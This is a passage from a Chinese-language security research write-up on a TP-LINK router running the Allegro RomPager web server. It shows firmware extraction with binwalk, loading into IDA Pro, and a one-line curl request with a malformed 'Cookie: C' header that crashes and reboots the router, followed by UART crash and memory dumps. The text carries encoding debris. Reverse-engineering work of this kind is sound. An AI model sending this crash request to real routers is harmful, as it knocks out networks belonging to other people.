所以,應(yīng)該通過(guò)atdo命令將它從內(nèi)存中備份出來(lái)��。
3) 路由所用的RTOS THREADX和allegrorompager一起從地址0×80020000開(kāi)始���。再一次,在執(zhí)行的前一階段它會(huì)解包和解壓���。至少地址0×65883的鏡像會(huì)完整的從固件中提取出來(lái)��,如下所示��。除此之外���,處理器構(gòu)架也能夠像下面這樣探測(cè)到��。
cawan$binwalk --disasm --minsn=100 65833
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 MIPS executable code, 32/64-bit,big endian, ...
所以, 0×65883的鏡像已經(jīng)準(zhǔn)備載入IDA Pro �����,其基址0×8002000����,處理器構(gòu)架為MIPS大端�����。通過(guò) Lior Oppenheim and Shahar Tal [2]得知, 這個(gè)漏洞的存在是因?yàn)閞ompager的web服務(wù)器中缺少了對(duì)“Cookie: C”的解釋?zhuān)?dāng)我們?nèi)缦滤觯?
cawan$curl --header 'Cookie: C' 192.168.1.1
會(huì)導(dǎo)致路由出現(xiàn)某種錯(cuò)誤并且立即重啟��。通過(guò)UART口的信息��,我們可以到類(lèi)似“Kernel Panic”的錯(cuò)誤輸出���。如下所示:
TP-LINK>
TLB refillexception occured!
EPC=0x8010E5D8
SR=0x10000003
CR=0xC080500C
$RA=0x00000000
BadVirtual Address = 0x00000000
UTLB_TLBS..coresys_isr.c:267 sysreset()
$r0= 0x00000000 $at= 0x80350000 $v0=0x00000000 $v1= 0x00000001
$a0= 0x00000001 $a1= 0x805D7AF8 $a2=0xFFFFFFFF $a3= 0x00000000
$t0= 0x8001FF80 $t1= 0xFFFFFFFE $t2= 0x804A8F38$t3= 0x804A9E47
$t4= 0x804A9460 $t5= 0x804A8A60 $t6=0x804A9D00 $t7= 0x00000040
$s0= 0x804A8A60 $s1= 0x8040C114 $s2=0x805E2BC8 $s3= 0x80042A70
$s4= 0x00000001 $s5= 0x8000007C $s6=0x8040E5FC $s7= 0x00000000
$t8= 0x804A9E48 $t9= 0x00000000 $k0=0x00000000 $k1= 0x8000007C
$gp= 0x8040F004 $sp= 0x805E2B60 $fp=0x805E2BC8 $ra= 0x8003A3D0
00 01 02 03 04 05 06 07 08 09 0A 0B0C 0D 0E 0F
805e2bc8:80 5e 2b f8 80 04 2a 70 80 4e d5 ba 00 00 00 01 .^+...*p.N......
805e2bd8:80 4e d5 ba 00 00 00 00 80 40 f8 ac 80 48 4e 29 [email protected])
805e2be8:80 55 54 4c 42 5f 54 4c 42 53 00 ba 80 41 34 0c .UTLB_TLBS...A4.
805e2bf8:80 5e 2c 18 80 10 e5 e0 80 42 64 dc 80 4e d5 b9 .^,......Bd..N..
805e2c08:80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0 .@.......@......
805e2c18:80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00 .^,0...8.@......
805e2c28:00 00 00 00 80 16 c4 28 80 5e 2c 40 80 10 ec 28 .......(.^,@...(
...
...
805e2f68:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2f78:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2f88:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2f98:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2fa8:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2fb8:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805e2fc8:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
current task = httpd
dump task = network
tx_stack_ptr = 0x805D5990
tx_stack_start = 0x805D3AF0
tx_stack_end = 0x805D5AEF
tx_stack_size = 0x00002000
tx_run_count = 0x00000220
00 01 02 03 04 05 06 07 08 09 0A 0B0C 0D 0E 0F
805d5990:00 00 00 00 80 5d 5a 70 80 44 2b f8 80 4a db 98 .....]Zp.D+..J..
805d59a0:80 44 2c 8c 80 44 2c 90 80 44 2c 7c 80 44 2c 94 .D,..D,..D,|.D,.
805d59b0:80 4a db 98 10 00 00 01 00 00 00 0a 00 00 00 00 .J..............
805d59c0:80 1e cc ac 10 00 00 01 00 00 00 00 80 51 47 98 .............QG.
805d59d0:00 00 00 00 00 00 05 dc 00 00 00 14 c0 a8 01 90 ................
805d59e0:80 5d 5a 90 80 07 20 c8 80 45 23 34 00 00 00 01 .]Z... ..E#4....
805d59f0:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805d5a00:00 00 00 00 80 4d ac 88 80 52 90 38 00 00 00 01 .....M...R.8....
805d5a10:c0 a8 01 90 00 00 00 01 80 5d 5a 90 80 51 47 98 .........]Z..QG.
805d5a20:80 45 23 34 00 00 00 14 00 00 00 00 00 00 00 00 .E#4............
805d5a30:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
805d5a40:00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 01 01 ................
805d5a50:10 00 00 01 80 4a db 98 00 00 00 00 00 00 00 00 .....J..........
...
...
Reservefor Print when Crash
Erasing 4KSector...
Erasing 4KSector...
writeRomBlock():Erase OK!
